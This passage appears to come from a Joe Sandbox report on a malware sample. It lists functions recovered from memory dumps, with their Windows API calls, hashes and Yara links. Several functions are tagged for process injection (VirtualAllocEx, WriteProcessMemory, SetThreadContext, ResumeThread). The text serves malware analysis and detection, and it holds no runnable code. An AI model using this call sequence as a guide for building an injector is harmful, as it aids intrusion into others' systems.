GetCurrentThread.KERNEL32 ref: 025ED493
GetCurrentProcess.KERNEL32 ref: 025ED4D0
GetCurrentThreadId.KERNEL32 ref: 025ED529

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4692c5a61ecc29000b46f0f2815c0ecec60b16ce92c839537fadd24cd0518a8e
Instruction ID: 5441fccd075299fac8b35723efb4e2265501e2fa5e12a53acd949a335775403b
Opcode Fuzzy Hash: 4692c5a61ecc29000b46f0f2815c0ecec60b16ce92c839537fadd24cd0518a8e
Instruction Fuzzy Hash: B55156B0901309DFEB58CFAAD548BEEBBF5BF88304F208459D419A7350D7746944CB6A

Function 06A778B5 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A77AF6

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cebd06c09b0768d742306cf11535b0db8114ba20b470c7c0c5605e1f76e34656
Instruction ID: 4f6adc3a12c468a1f1427a76575da23e1b2f8e5f28a405e83ab2fa74454546be
Opcode Fuzzy Hash: cebd06c09b0768d742306cf11535b0db8114ba20b470c7c0c5605e1f76e34656
Instruction Fuzzy Hash: 74A16A71D00219DFEF64DF68CC41BAEBBB2BF88300F1485A9E859A7240DB759985CF91

Function 06A778C0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A77AF6

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a8f4eaff3805c915c85b5cf2324163ef27f0073ac772ce1b31b798cd90eb108d
Instruction ID: ab3a467c7c60b4590d1e9f66328bf5b22972891a01a86ebdcba4d6cb2ee9f56c
Opcode Fuzzy Hash: a8f4eaff3805c915c85b5cf2324163ef27f0073ac772ce1b31b798cd90eb108d
Instruction Fuzzy Hash: BB916A71D00219DFEF60DF68CC41BAEBBB2BF88300F1485A9E809A7240DB759985CF91

Function 025EAD48 Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65b39822e1124f2e77b524b8b63d9d5a60b6c7a26eaa8892e911c0c25f675a1
Instruction ID: b0f8819cb0edba2b58358c1a84965758d26c4d803f142e0b31a993d2ad7aebe6
Opcode Fuzzy Hash: e65b39822e1124f2e77b524b8b63d9d5a60b6c7a26eaa8892e911c0c25f675a1
Instruction Fuzzy Hash: 23713670A00B058FDB28DF39D45475ABBF2FF88304F148A29D08AC7A50DB75E849CB95

Function 025E58EC Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025E59A9

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2d4123d68665b3463421952cad2fa10d0b39d44b4c5f03a7d0830c854c89ea26
Instruction ID: 58f2aca105d7477b32478fa1bc79629e7da0e84016a646a81536d6fbcfec24ce
Opcode Fuzzy Hash: 2d4123d68665b3463421952cad2fa10d0b39d44b4c5f03a7d0830c854c89ea26
Instruction Fuzzy Hash: 5E41F3B0C00759CBEF14CFA9C88478EBBB5BF89704F60816AD419AB251D7716946CF54

Function 025E44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025E59A9

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 54ca47c276ffd8f734bc9fe8b4b96de2695b2faffffd7dcc9d41f5867f4742ca
Instruction ID: ba01026d7a67c1d5766cae9c7bd9317775a439c64a14f82597c97f3517527ddf
Opcode Fuzzy Hash: 54ca47c276ffd8f734bc9fe8b4b96de2695b2faffffd7dcc9d41f5867f4742ca
Instruction Fuzzy Hash: CC41F1B0C0071DCBEF24CFA9C844B8EBBB5BF89704F60816AD409AB251DB716949CF90

Function 025E5A64 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f115f1a665147ea62770fa85118d169d8b5dba3f7e059874320007fabeb2ec
Instruction ID: 018fc315afcc9ecbe3e09aaddbb4abc8c3c1454e245a1023aa10ffcf633f7d75
Opcode Fuzzy Hash: 92f115f1a665147ea62770fa85118d169d8b5dba3f7e059874320007fabeb2ec
Instruction Fuzzy Hash: 3C31D870804788CFEF15CFA8C4557DEBBF1BF5A308F94418AC442AB252E779A90ACB05

Function 06A77631 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A776C8

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 06e5172131dd0e0366ade0a93aa557eaa4002b8d236774f781e5945f43167d12
Instruction ID: 846d75fc653e5a711d4f9e70a3a597897121c724b5aa0266bfda0d6f37ba49de
Opcode Fuzzy Hash: 06e5172131dd0e0366ade0a93aa557eaa4002b8d236774f781e5945f43167d12
Instruction Fuzzy Hash: 552135719003499FDF10DFAAC885BDEBBF5FF48310F10882AE919A7240D778A954CBA4

Function 06A77638 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A776C8

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2c29c9409972ae3c2583898963daf2c570376515684ffe624e97130d7d7f837b
Instruction ID: 8610745bb0e24b96711d751e76d7a777d4a64a8e66e1b7bade6ab8553d08bee4
Opcode Fuzzy Hash: 2c29c9409972ae3c2583898963daf2c570376515684ffe624e97130d7d7f837b
Instruction Fuzzy Hash: 182126719003499FDF10DFA9C881BDEBBF5FF48310F108429E918A7240D778A954CBA4

Function 06A77721 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A777A8

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cf07605ce28207e45280bf5c13e150c2f8b97b43d8fce0c3aa45b222c203dc3d
Instruction ID: 5ab933c9d53f4a0a13a7cac9da561bb4dd388d4fe719a30143cebf03fbf63209
Opcode Fuzzy Hash: cf07605ce28207e45280bf5c13e150c2f8b97b43d8fce0c3aa45b222c203dc3d
Instruction Fuzzy Hash: B82125B1C003499FDB10DFAAC881ADEFBF5FF88310F10842AE919A7250C738A514CBA4

Function 06A77728 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A777A8

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 645d605efbd35fcbc19a13e9a611798908793b8268e95148f871dbcc05b470de
Instruction ID: a4e3ef0b7159ee15dc5cbe35f3ec2d0c58b528fd9bb51272626d053185e2e4ce
Opcode Fuzzy Hash: 645d605efbd35fcbc19a13e9a611798908793b8268e95148f871dbcc05b470de
Instruction Fuzzy Hash: E5212871C003499FDB10DFAAC881BDEBBF5FF88310F108429E918A7240C7799514CBA4

Function 06A77068 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A770E6

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 47532ab0a0f96f6ae14d1abd72698633b4c5ea0e3ca0b1583e13d713bbe29271
Instruction ID: aad7fd6a0b9d2d8acf5f0608ec32b0197625ccc4d1fd9329f89eb58b9b9034f8
Opcode Fuzzy Hash: 47532ab0a0f96f6ae14d1abd72698633b4c5ea0e3ca0b1583e13d713bbe29271
Instruction Fuzzy Hash: 07214771D003098FDB10DFAAC885BEEBBF4EF88310F14842AD519A7240CB79A945CFA5

Function 025ED61F Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025ED6A7

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0e15c6c5548a24936a700f3f541b5ecf98195a24ecfe0093e86045a85fa1046b
Instruction ID: fc4b748464b854fa6e8588ddf6dde7449f99c0aeca7f62ea0fe61b0e773f9562
Opcode Fuzzy Hash: 0e15c6c5548a24936a700f3f541b5ecf98195a24ecfe0093e86045a85fa1046b
Instruction Fuzzy Hash: BA21E4B5901248DFDB10CFAAD984ADEBFF8FB48310F14801AE918A7310C378A954CF65

Function 025ED620 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025ED6A7

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ec1b6cacf133f55c73d689ea01337558b175f6f1d3f4b7c1488788111f721df4
Instruction ID: 4cb2b6f50ecdfcbbf546959c1255b44ba2ac0bbbc720df3c1fb187df6cdcfb3e
Opcode Fuzzy Hash: ec1b6cacf133f55c73d689ea01337558b175f6f1d3f4b7c1488788111f721df4
Instruction Fuzzy Hash: CE21E4B5900248DFDB10CFAAD984ADEBBF8FB48310F14801AE918A7310C378A954CF65

Function 06A77061 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A770E6

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 649043d8b67f67772c385205ef7c1e42182eed1defdbc1df5d4d153c6122c876
Instruction ID: b4d1b7cac0d631db04673e184afd24411cea0cbf99b93849894e5de7ed610987
Opcode Fuzzy Hash: 649043d8b67f67772c385205ef7c1e42182eed1defdbc1df5d4d153c6122c876
Instruction Fuzzy Hash: 78213771D003098FDB14DFAAC9857AEBBF4EF88310F14842AD459A7240CB799545CFA5

Function 025EA108 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025EB019,00000800,00000000,00000000), ref: 025EB22A

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 498b04203d5c102ab7bbbc29fb74f008db971a920a40ed606aa26b5f7f4a1999
Instruction ID: 346dac49f13c9a9694918f7e6a6dd6ed682bed237e58d03187137ea036e89902
Opcode Fuzzy Hash: 498b04203d5c102ab7bbbc29fb74f008db971a920a40ed606aa26b5f7f4a1999
Instruction Fuzzy Hash: B111D3B69003499FDB14CF9AD444B9EFBF8FF88314F10842AE519A7200C375A945CFA9

Function 025EB1B9 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025EB019,00000800,00000000,00000000), ref: 025EB22A

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 62969c37a6369cf1e177532207fca76c1ac46ad21b36d8044e3b57c2dd96d223
Instruction ID: a4f135a5cfb4153c2ac8fdcf68e424a55be42713d5e504e3b488571d50c89726
Opcode Fuzzy Hash: 62969c37a6369cf1e177532207fca76c1ac46ad21b36d8044e3b57c2dd96d223
Instruction Fuzzy Hash: 231114B6D00249DFDB14CFAAD984ADEFBF4BF88314F10846AD519A7200C375A545CFA5

Function 06A77570 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A775E6

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 86014a6ba4f1bfcd94b519538a718ad0042f2a1c7f44c5b755c81f1ba871ec1c
Instruction ID: ed8f9e16e86ee078442c7938cd7fc13142b91adeae32fb97bd12c52cdb0a0489
Opcode Fuzzy Hash: 86014a6ba4f1bfcd94b519538a718ad0042f2a1c7f44c5b755c81f1ba871ec1c
Instruction Fuzzy Hash: 9A1164728003499FDB10DFAAC845BDEBBF9EF88310F10881AE515A7250C735A514CFA0

Function 06A77578 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A775E6

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 77530ab58b6ef6ba5d738fa7625298f56275df40f65a56aabf4b784d288292a5
Instruction ID: 09d4bb0cd45c6f3ca055f5bc4befa063f868f5cc51dae0adeb7cffa2fb715e9b
Opcode Fuzzy Hash: 77530ab58b6ef6ba5d738fa7625298f56275df40f65a56aabf4b784d288292a5
Instruction Fuzzy Hash: 4B1123718003499FDB10DFAAC845BDEBBF5EF88320F248819E519A7250CB79A954CFA4

Function 06A76FB8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06A7701A

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e0ba773bc3ce0a4f297695541dd393bc105a9f134818ed4281fd3964fb514a5d
Instruction ID: 8f76c57b4cec8f114030140c4eaafdb20720237a4d709ad6c503d6845c070022
Opcode Fuzzy Hash: e0ba773bc3ce0a4f297695541dd393bc105a9f134818ed4281fd3964fb514a5d
Instruction Fuzzy Hash: 181125B1D003498FDB24DFAAC84579EFBF9AF88620F248419D519A7240CB79A945CBA4

Function 06A76FB1 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06A7701A

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e9b2b1219980420c1853c00a03d2b266f5efd841633464a1cbe20901ad410e4a
Instruction ID: bc80b9e67cb103b1103a665a768dda98ca93adfaef90416de2878bba1306d6c6
Opcode Fuzzy Hash: e9b2b1219980420c1853c00a03d2b266f5efd841633464a1cbe20901ad410e4a
Instruction Fuzzy Hash: FB1155B1D00349CFEB24DFAAC94579EFBF5EF88310F24881AD519A7240CB39A505CBA4

Function 025EAF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025EAF9E

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a8c48c2eeee99ab49c6b06fcf35b89b1f940b7914ddfaf238759edadcc34e483
Instruction ID: a816e5aa6d814d8b0de3a4127f3c59504956750251d71285022e9b27c677f0ee
Opcode Fuzzy Hash: a8c48c2eeee99ab49c6b06fcf35b89b1f940b7914ddfaf238759edadcc34e483
Instruction Fuzzy Hash: 1F11DFB6C006498FDB14CFAAD544BDEFBF4AB88214F11845AD829A7210C379A545CFA5

Function 025EAF37 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025EAF9E

Memory Dump Source

Source File: 00000000.00000002.2117883220.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5e3002e7c76c89969a9393c4171f1df884acede070d80168720e1dcdcb99316a
Instruction ID: 9322c8a1f8ff57c154464696589cc7b0e89feba37dad351a918591b8f03460d1
Opcode Fuzzy Hash: 5e3002e7c76c89969a9393c4171f1df884acede070d80168720e1dcdcb99316a
Instruction Fuzzy Hash: 8611E0B6C00649CFDB14CFAAD544BDEFBF4FB88214F11845AD829A7210C379A545CFA5

Function 06A790B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06A7C13D

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3562460e0bd031b9b42c0ee617cbd1b7ecf42a9849602162a0c6715620fc1a8a
Instruction ID: a63b12f86506bccde9ad47ec4c7384b6fa78e7bfa058c5d0bd3314ce55d3647b
Opcode Fuzzy Hash: 3562460e0bd031b9b42c0ee617cbd1b7ecf42a9849602162a0c6715620fc1a8a
Instruction Fuzzy Hash: 5A11F2B5800349DFDB50DF9AD845BDEBBF8EB48324F108459E919A7200C375A954CFA5

Function 06A7C0D9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06A7C13D

Memory Dump Source

Source File: 00000000.00000002.2123891487.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a70000_8SxJ9aYfJ1.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d96ca965ad46429059f6d93a808e0b1f1ace9389dd3960f371bba21777b2caf2
Instruction ID: f30fd678a47423891e01d0d4d3ac69dfa8f5cea6e774c3ddeb0846497cd41087
Opcode Fuzzy Hash: d96ca965ad46429059f6d93a808e0b1f1ace9389dd3960f371bba21777b2caf2
Instruction Fuzzy Hash: 191100B5800249DFDB20DF99D985BDEFBF8FB48324F10845AE919A7200C374A994CFA1

Function 073E7E30 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

O, xrefs: 073E7EAF

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: fc7a2d4f845189c4d2c9a9acd7be7bc67051ace4f349eecd890f87a885555e63
Instruction ID: 48271824bb7b4b04095a479ffb08981ef0e34cbc87687248b7f15c107a6f90e8
Opcode Fuzzy Hash: fc7a2d4f845189c4d2c9a9acd7be7bc67051ace4f349eecd890f87a885555e63
Instruction Fuzzy Hash: 64118E70A006049FD724EF69D844A6BBBFAEF89304B00882DE5599B320EB30E905C7A1

Function 073E7E20 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

O, xrefs: 073E7EAF

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: 6e772279a781f71b1e34e507ca7f084ec0ffa2916030ba728cb8ce353bf85616
Instruction ID: ac6611e4463f2d0447bf2bddb57f2d5b3535eadaebcbb4e478e8d0a8984b7960
Opcode Fuzzy Hash: 6e772279a781f71b1e34e507ca7f084ec0ffa2916030ba728cb8ce353bf85616
Instruction Fuzzy Hash: 0301F47A7042508FC710CBA8C8448BBBBF5EFCD321700866AE028DB271E2308D02C361

Function 073E8720 Relevance: .7, Instructions: 743COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2734268a3afecd956e3bd26735d81e15fb54e2234057d7fd0cf23f35854ef9
Instruction ID: 2f67c38102868286b124cccd66e0bc05934de0f6ef7dea0c26a1d27984970487
Opcode Fuzzy Hash: 7a2734268a3afecd956e3bd26735d81e15fb54e2234057d7fd0cf23f35854ef9
Instruction Fuzzy Hash: C46223B0D00B5B8BEF745FB589883AD76A5AB45344F11491FD0EFDA6E0DB34A8818B43

Function 073E07D0 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc298185ce04641c6e271b1df0e4aa1b1b2fecfab2012971018f4798265d14a7
Instruction ID: ce4292d1896b902c47771d7e16145bcb88424610f9967ab064e71cf4bccff555
Opcode Fuzzy Hash: fc298185ce04641c6e271b1df0e4aa1b1b2fecfab2012971018f4798265d14a7
Instruction Fuzzy Hash: E3917F70B00615CFEB18DF68D490AAEB7F6FF89700F248569D44A9B3A4DB70AC45CB90

Function 073E7B68 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11e5df9d885eb6d4170cf699d7cceef384243104e1bed473bbeebdcf9dadce0
Instruction ID: 08ff518c4fcd50162e42989aa10ee70b188add6c9d0915589790cdf3797cf79f
Opcode Fuzzy Hash: b11e5df9d885eb6d4170cf699d7cceef384243104e1bed473bbeebdcf9dadce0
Instruction Fuzzy Hash: 5B811674600601DFD745EF78D894AAABBF6FF89304B108569E51ACB3A0DF70AD45CB90

Function 073E3498 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb9434ecb466347affde09a74b8f5bfe629d0392a97c8f0730c8292ccdd74bc
Instruction ID: c31fc482995461048d5ab1f2e13c1a5cbf243427fb4e49a266aaeeac143bd499
Opcode Fuzzy Hash: 9bb9434ecb466347affde09a74b8f5bfe629d0392a97c8f0730c8292ccdd74bc
Instruction Fuzzy Hash: 5151B1F1B042668FEB14DF78D8C46AE7FBAAFC5610B064069D509D73D1DB31E8418BA2

Function 073E3070 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124124609.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73e0000_8SxJ9aYfJ1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61749d7289bb58a8a76b9ee0cd3b6c758a340b8cec985592bcf61d7432988cd
Instruction ID: 67fed8958c5d0914a56cf0de715f528d7d20860254372106fc17b2373974924c
Opcode Fuzzy Hash: a61749d7289bb58a8a76b9ee0cd3b6c758a340b8cec985592bcf61d7432988cd
Instruction Fuzzy Hash: A7618DB5B0012ADFDB15DF68D854AAD7BBAEF89311F104069E906A73A4DB319C41CF90

Function 073EB7A4 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

